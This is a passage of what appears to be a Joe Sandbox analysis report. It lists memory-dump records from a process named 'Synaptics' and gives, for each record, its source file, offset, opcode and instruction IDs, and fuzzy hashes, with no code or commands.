                                                    • Instruction Fuzzy Hash: 3011C6317852275B8BE4AAAAD9548AFABCBEFD45147008A29F507CB334DF71AC0187D1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391318580.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_158d000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0f26582063e05542ec36bc46ddbc3f97a61375dc57ed1098e0466235ef1fdafb
                                                    • Instruction ID: 74ec6e09fda3ca26e89a44488551ae790ddd35806e78d3e5fc923c715e73a796
                                                    • Opcode Fuzzy Hash: 0f26582063e05542ec36bc46ddbc3f97a61375dc57ed1098e0466235ef1fdafb
                                                    • Instruction Fuzzy Hash: 07216D75509380CFDB02CF64D590715BFB1AB46214F28C5EAD8498F697C33A984ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4a41c3be64b8a9f3d38be44d50539d5ecda2ebeb40ca36f0a732fc7368d52cf9
                                                    • Instruction ID: 4ea63edc11feeedbda343880b7fb5741137942beace75a9e91745733ebe890eb
                                                    • Opcode Fuzzy Hash: 4a41c3be64b8a9f3d38be44d50539d5ecda2ebeb40ca36f0a732fc7368d52cf9
                                                    • Instruction Fuzzy Hash: 6F21E4356002159FCB51CF68D884A99BBF6FF99324B248559E41ACB3A2C731ED02CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ae4479bcb9c4ab4bf1f5c60e2f29f5760e224ca9f8cce083f1529563c1928eb5
                                                    • Instruction ID: 20be89005fa46d535c64b7edc61d8f086c829e1c6ad76623c4fd6628a3413210
                                                    • Opcode Fuzzy Hash: ae4479bcb9c4ab4bf1f5c60e2f29f5760e224ca9f8cce083f1529563c1928eb5
                                                    • Instruction Fuzzy Hash: C311CA76B003408FD3608F29C884B0ABBE6EBC9318F54946CE449CB346DA32EC85CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b672087b20650836d955ee05a48d49b4784709a880c50fda7fa1673360347c93
                                                    • Instruction ID: d77fe9c62e6f6c554e0b4c54d4bee0819e39f4dd0f295b1fcf4f82312fb61cbe
                                                    • Opcode Fuzzy Hash: b672087b20650836d955ee05a48d49b4784709a880c50fda7fa1673360347c93
                                                    • Instruction Fuzzy Hash: B901DB317852279BCBE4AA66D9408AEBFD7EFC45147008929F406CB334DB71AC0187D1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e50bce4b6c1b466bc45e5296f7d0bf7fb496a4bd7249d876c5205a16d621fbb
                                                    • Instruction ID: 0f8de8fc030a5d2fae492f6e8a94d82f56586e2221bf5e892d18ce35acf0a979
                                                    • Opcode Fuzzy Hash: 6e50bce4b6c1b466bc45e5296f7d0bf7fb496a4bd7249d876c5205a16d621fbb
                                                    • Instruction Fuzzy Hash: 7311A0766043059FDB61CF65D448A9AFBF6FF89314B008969E449CB721DB71EC41CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0b5e7e94fbd3630e033d1e7bd7565c98cbc1e61a77b96d21f18b2e76de9d4ffd
                                                    • Instruction ID: c816b129234d6f3e649be5b9163004f7aa45c9510d91858bc0c0d6285d3d96f9
                                                    • Opcode Fuzzy Hash: 0b5e7e94fbd3630e033d1e7bd7565c98cbc1e61a77b96d21f18b2e76de9d4ffd
                                                    • Instruction Fuzzy Hash: 5D014539B887078FCB8617B5CC5616A7FE59F42104B0845A5E84ACB7C3DE14EC02CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8390fca9ba350ef3a9acc255e50b4c4fec8ef986b69b7d589782f52812efabec
                                                    • Instruction ID: c9f6ddaf834bbb1958effcbaed6221f11247251dcc5ec1e5e831337d9b40ddb7
                                                    • Opcode Fuzzy Hash: 8390fca9ba350ef3a9acc255e50b4c4fec8ef986b69b7d589782f52812efabec
                                                    • Instruction Fuzzy Hash: E00180753053109FD3249F35D880A56B7E5EBC9269B14497DF446C7341DF32E806CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8894a14b11e4f694f9fc69749ab7c81319a61c1b19b089d6af723f320777cbb7
                                                    • Instruction ID: 0bda732af7c352557f1ecb89727d5a8a562071076fd08721aeb9e459c1930a55
                                                    • Opcode Fuzzy Hash: 8894a14b11e4f694f9fc69749ab7c81319a61c1b19b089d6af723f320777cbb7
                                                    • Instruction Fuzzy Hash: 3E11DD74A00206CFD7A4CB2AC644BAAFBE5FF40224F089129E418C7A62E374F945CFC0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a97e5b1884b2b12286cc8f021fcc096c8c236d41f302893ca99f851cb24d8e9
                                                    • Instruction ID: d2db1d48879b01a95837110313ec23fa9907d3b5bad79b43411faa7c29bb02a0
                                                    • Opcode Fuzzy Hash: 0a97e5b1884b2b12286cc8f021fcc096c8c236d41f302893ca99f851cb24d8e9
                                                    • Instruction Fuzzy Hash: A001D63A243219BFC66166B8EC17FC73F9EDF59114B450198F0C9972669F2108868AF6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dbff664bf2652742d0b8addcf41ae2f9c2263833a3d339317edc7237ce63b320
                                                    • Instruction ID: 0c318cce10a31cd170b33f388b42db2c9545e87f59d5304d8991d1e6b6410f67
                                                    • Opcode Fuzzy Hash: dbff664bf2652742d0b8addcf41ae2f9c2263833a3d339317edc7237ce63b320
                                                    • Instruction Fuzzy Hash: 9D11CB356043099FCB64DF69D44899ABBF6FF89324B008929E809CB360DB70EC44CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 48f1035099a35b5a7aada8000d4aa0e581e8e2ac0ad7dd4d9471964ac8eed96b
                                                    • Instruction ID: f203be0bced896c392ba982d231fcceca7454a69fb2c9e526ef3c25035850c45
                                                    • Opcode Fuzzy Hash: 48f1035099a35b5a7aada8000d4aa0e581e8e2ac0ad7dd4d9471964ac8eed96b
                                                    • Instruction Fuzzy Hash: A8118E396102199F8B44DFA5D8488AFBFF6EB882107008025F509D7214DB30A941CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e10ca1742e4b520661ae1a104957ee5d04d4b54691f5abcdd178668839950459
                                                    • Instruction ID: 01cf84af2f44be61fdc9dcde5a522efecdc0e606dd3afe70206eafde108c6149
                                                    • Opcode Fuzzy Hash: e10ca1742e4b520661ae1a104957ee5d04d4b54691f5abcdd178668839950459
                                                    • Instruction Fuzzy Hash: 1711A0356002059FCB04DF68D888D9EBBF6FF89324B208569E809CB361DB31ED02CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: efbb6a549f74afac0bc96bfeb5cff46a6e17a1b691e4a51992619e42a5389228
                                                    • Instruction ID: b49abbb9a4b2b868cc5e1f8d106adbf5d7f9c6f95e5ce523074c26e43c43a153
                                                    • Opcode Fuzzy Hash: efbb6a549f74afac0bc96bfeb5cff46a6e17a1b691e4a51992619e42a5389228
                                                    • Instruction Fuzzy Hash: 3A01DE387043008BCB388E36D894437BBA7FBCA22532484BDE4464B795CE71F846CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1ae3ee352372a90351d07ef0eacc529458c6def909c32f13b1b966c2ffe314d9
                                                    • Instruction ID: a9a7d317babe705afea6ead3c92841bb115e50b31719e4423ae60cc2df2f74d7
                                                    • Opcode Fuzzy Hash: 1ae3ee352372a90351d07ef0eacc529458c6def909c32f13b1b966c2ffe314d9
                                                    • Instruction Fuzzy Hash: 930141367043008BC7388E3AC894537BBA6FF9A22475844BDE4824B7A1CE31F806CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ce16525c92c703b9aa49fd0ebdea140470e3afb5d08a7b7e8ae5d1e1b5de6c9d
                                                    • Instruction ID: daadd0c1db63d498ca102c52cbb3c8d13362733988ec4a34b5b0ed9efaac0ee1
                                                    • Opcode Fuzzy Hash: ce16525c92c703b9aa49fd0ebdea140470e3afb5d08a7b7e8ae5d1e1b5de6c9d
                                                    • Instruction Fuzzy Hash: 6801AD3AA1021A9FCF44DFB5D8499AFBFF5EB88220B04853AF509D3254DB309952CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c8ac5ae2f89d484bb0b8b848bb4f425fedc43a3c6857225da85b75f66efaf293
                                                    • Instruction ID: f9561bf6330cc63d5365d9441289b4e4aa03e6d0ec047672cdbd27ddb25f5bab
                                                    • Opcode Fuzzy Hash: c8ac5ae2f89d484bb0b8b848bb4f425fedc43a3c6857225da85b75f66efaf293
                                                    • Instruction Fuzzy Hash: D61153B5A002028FD788CF29C488B5ABBF5FF98348F1480A8E505CB361CB32DC84CB81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8562e54d247ff2395f9bad0bc9deae9d66b957d90c29dc9d36a9ed5bbcca49a9
                                                    • Instruction ID: 8ecebd1c6ea1690d4f1212da3df397610ce4c60f0bb987449362993d5948f96d
                                                    • Opcode Fuzzy Hash: 8562e54d247ff2395f9bad0bc9deae9d66b957d90c29dc9d36a9ed5bbcca49a9
                                                    • Instruction Fuzzy Hash: 6701FF36344A049FC764CA6ED885D1AFBF9FF896207140A69F15AC7761CA21EC428B51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cca97dd6778a107a7edfb2bfb9fabc504de00f5fde2b60a70103c49dc763d36f
                                                    • Instruction ID: e48758d69679c8db828efc83ef2cd397d1ae8651e6f289e9ef0512f0c82428d2
                                                    • Opcode Fuzzy Hash: cca97dd6778a107a7edfb2bfb9fabc504de00f5fde2b60a70103c49dc763d36f
                                                    • Instruction Fuzzy Hash: C2F0B432B542118FDB88DFA9B4444AE7BF9EB4416571480BBF00EC7650EE31D980CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 525a929a3be54159759d8441eb274664569c6f8149958a05f55f0e3e3d65ffc9
                                                    • Instruction ID: 36f83ff95e89a84f2b4e6ee4d717546b4ac4a45fd5f2996cd3b0b306eecea4e0
                                                    • Opcode Fuzzy Hash: 525a929a3be54159759d8441eb274664569c6f8149958a05f55f0e3e3d65ffc9
                                                    • Instruction Fuzzy Hash: B2F0F632B441595FC7608B4AD484D4BFFA9AB84321B168156E52A8B655CB71FC00C7D5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5620e57bb2bbd5e231425664df80017e74a29fcaa6281db0cf9520a93212bc8d
                                                    • Instruction ID: 07d761329ccf8346dc0660c7503946d65bd01de68b24f6f6d221727f8dce2a15
                                                    • Opcode Fuzzy Hash: 5620e57bb2bbd5e231425664df80017e74a29fcaa6281db0cf9520a93212bc8d
                                                    • Instruction Fuzzy Hash: 11F0E5322082506FD3B4466BAC85B677FECDF855A1F1844BAF089C3680E535D502CA60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 180649386dc0b7d8d7218fdfe0280edcf1231b4cf7486370608d7bbb24e4ee15
                                                    • Instruction ID: 219159e60dea267904b206b5d30a54a35b518a3ab61f696889dac8c002b9fa1a
                                                    • Opcode Fuzzy Hash: 180649386dc0b7d8d7218fdfe0280edcf1231b4cf7486370608d7bbb24e4ee15
                                                    • Instruction Fuzzy Hash: CDF0A0393013109FC3258A3AA8848137BBAEFC9325320557DF94AC7302DE32EC05CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7a546195d93021b9a9dcd2b4b6450c32d10fb80eaa836c4afb35ecd6c52055e2
                                                    • Instruction ID: ec51ba711ae55df016f1ecfa2f50fcf851372cd866321d8a9dc10599a045ccef
                                                    • Opcode Fuzzy Hash: 7a546195d93021b9a9dcd2b4b6450c32d10fb80eaa836c4afb35ecd6c52055e2
                                                    • Instruction Fuzzy Hash: 8DE0D820B193904FCB1723F4542906D3FEB8FC7905795489BD10ADB791DE588C4ACBE2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fb7f12b42c657421349ef84f0680bed053f9ead5f8473adb8da42f21251ba80d
                                                    • Instruction ID: ff00aee7ff458fa3f82ca8c84985548d4fd00bd0c1733ce5c59088997120c819
                                                    • Opcode Fuzzy Hash: fb7f12b42c657421349ef84f0680bed053f9ead5f8473adb8da42f21251ba80d
                                                    • Instruction Fuzzy Hash: D9E0C23A716A1507D781099DA98E77AABCBDBCD4657584036F509C3B06DDA4CC074682
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4e24c37476cf1949a7099e50d3d069f76f040f60681b099bf2fdd59062e99a19
                                                    • Instruction ID: 62e73f236034b61b63b4b228d0cbbc5f1d29db263ec2f4cc5da28a37de854acb
                                                    • Opcode Fuzzy Hash: 4e24c37476cf1949a7099e50d3d069f76f040f60681b099bf2fdd59062e99a19
                                                    • Instruction Fuzzy Hash: ACD0A736725115170794158F78C883BBECFD7DD5B5314003AF50DC3302DDA0CC024691
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c1ddedd8ef8471fa17d5c4544cae8e93a4cc293e58fd8f4888718b2fd9de27fc
                                                    • Instruction ID: bc5e349d6181d33ea215f7cbb37df8929cd391060e9aa78bbb1b3d77cebc7315
                                                    • Opcode Fuzzy Hash: c1ddedd8ef8471fa17d5c4544cae8e93a4cc293e58fd8f4888718b2fd9de27fc
                                                    • Instruction Fuzzy Hash: 27D05E7A3080086F6A592919ECD9CFF3F2BD7D46F57208012F84586350CE239C529AA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0ef90cb788adf08b79ba271f75f208305fbf06a3f4fbfb148a71700e21b500db
                                                    • Instruction ID: b61527792b023c3961b702a8717213f8b20549b9aeff6dabc4763de8e23a8461
                                                    • Opcode Fuzzy Hash: 0ef90cb788adf08b79ba271f75f208305fbf06a3f4fbfb148a71700e21b500db
                                                    • Instruction Fuzzy Hash: 85E0C2363401394B8984F7D5D5148DA3BDEBF8911434106E5D44E5B331DF60AC0147D5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 61612c5aa4810dc150ac7685353ba9d7df23386b9c88499dafeb5bef08b79276
                                                    • Instruction ID: b4e264ae175344b47a915fdea69aac019d31a08e1a884e88f6ac4ff1f04d0f3a
                                                    • Opcode Fuzzy Hash: 61612c5aa4810dc150ac7685353ba9d7df23386b9c88499dafeb5bef08b79276
                                                    • Instruction Fuzzy Hash: 32E0CD367042448FC7154F64D4585E77BA5DF9921134485AAE9DA8B71AC6219C41CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1112893d1325f68fb10ade0053685ef6ded32e609a71528318664a97d264fbdb
                                                    • Instruction ID: 0912e855903484f983dcd9cfc7394810c3e00bb551775086a5b4629f52259236
                                                    • Opcode Fuzzy Hash: 1112893d1325f68fb10ade0053685ef6ded32e609a71528318664a97d264fbdb
                                                    • Instruction Fuzzy Hash: 2ED0221024E7E50FC31313E93898495BFE98E4746032C80EBE2C8C7113C48C89838BE2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 79dc0169ef11e299060afd4e79af1f9d8736c7cdd197dfc05f641e6f23d1fa7c
                                                    • Instruction ID: f5ca15821124f495a4e7d2ede49589464621ffb0a1eb22bd08f6fd9c90a711e9
                                                    • Opcode Fuzzy Hash: 79dc0169ef11e299060afd4e79af1f9d8736c7cdd197dfc05f641e6f23d1fa7c
                                                    • Instruction Fuzzy Hash: FBD0226224D2C04FC7538228ACD68E1BF30EA030283080AE7E0C8AB083C200A00FC312
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1be4c31fbdca02a8a3dee50fc16d9e9b46aa886f0090c803fc3670cadac99ceb
                                                    • Instruction ID: 5fd78b6d73b11a0150e9dad17abf78e63affec10a221f416d88440e4b892c066
                                                    • Opcode Fuzzy Hash: 1be4c31fbdca02a8a3dee50fc16d9e9b46aa886f0090c803fc3670cadac99ceb
                                                    • Instruction Fuzzy Hash: D8D0C939B40008CF9B44DFAEE0984DD7BB5EF89215B8000A6E21AC7670DF309C15CF82
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c272cd238054577809ad4fc088f0e5222045fb8fb8fb6948d23b633a562f2a76
                                                    • Instruction ID: 5b7ca383afb37357f9178f70e3ec9434ac41a681e51a9b0d4612dfb8bd768123
                                                    • Opcode Fuzzy Hash: c272cd238054577809ad4fc088f0e5222045fb8fb8fb6948d23b633a562f2a76
                                                    • Instruction Fuzzy Hash: 1ED01235740004CF8744DF99D4584DD77B5DF94215B9000E6E206C7630CB30AC55CB81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ede3ef72e7a9e1344e79dc7e8e63aae24c24e89e8becbab1b07525936130313e
                                                    • Instruction ID: c2a3cb9bf1a64158b167636ac8844108a9411423025d09802a26eb7fe51153d5
                                                    • Opcode Fuzzy Hash: ede3ef72e7a9e1344e79dc7e8e63aae24c24e89e8becbab1b07525936130313e
                                                    • Instruction Fuzzy Hash: B7C01272A8A18AAFD7594AA1BC092A43BB6AB63206F010182FC09440219A25080ACAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2545cf98c9d59535abda62b29e1fdd204cf27007b54d96f58eb88fb9a8d083d1
                                                    • Instruction ID: c4b2afcdb0c5f2f7e428d148cec40acd2ed05a7a76a48790e708d244356338d1
                                                    • Opcode Fuzzy Hash: 2545cf98c9d59535abda62b29e1fdd204cf27007b54d96f58eb88fb9a8d083d1
                                                    • Instruction Fuzzy Hash: 59C09270511244CFCB06CF20C0488107B72AF4230A35980D8E0098B622CB32DC82CF00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
